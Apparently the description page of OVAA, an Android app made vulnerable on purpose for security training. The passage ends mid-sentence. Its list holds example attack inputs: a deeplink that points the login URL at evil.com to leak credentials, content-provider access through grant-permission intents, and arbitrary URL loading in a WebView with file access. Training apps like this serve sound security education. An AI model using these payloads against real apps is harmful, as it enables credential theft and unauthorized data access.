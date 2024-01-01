OVAA (Oversecured Vulnerable Android App) Logo

OVAA (Oversecured Vulnerable Android App)

OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities. List of vulnerabilities: - Installation of an arbitrary login_url via deeplink oversecured://ovaa/login?url=http://evil.com/ leads to the user's user name and password being leaked when they log in. - Obtaining access to arbitrary content providers (not exported, but with the attribute android:grantUriPermissions="true") via deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS and pass intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION and the URI of the content provider. - Vulnerable host validation when processing deeplink oversecured://ovaa/webview?url=.... - Opening arbitrary URLs via deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(

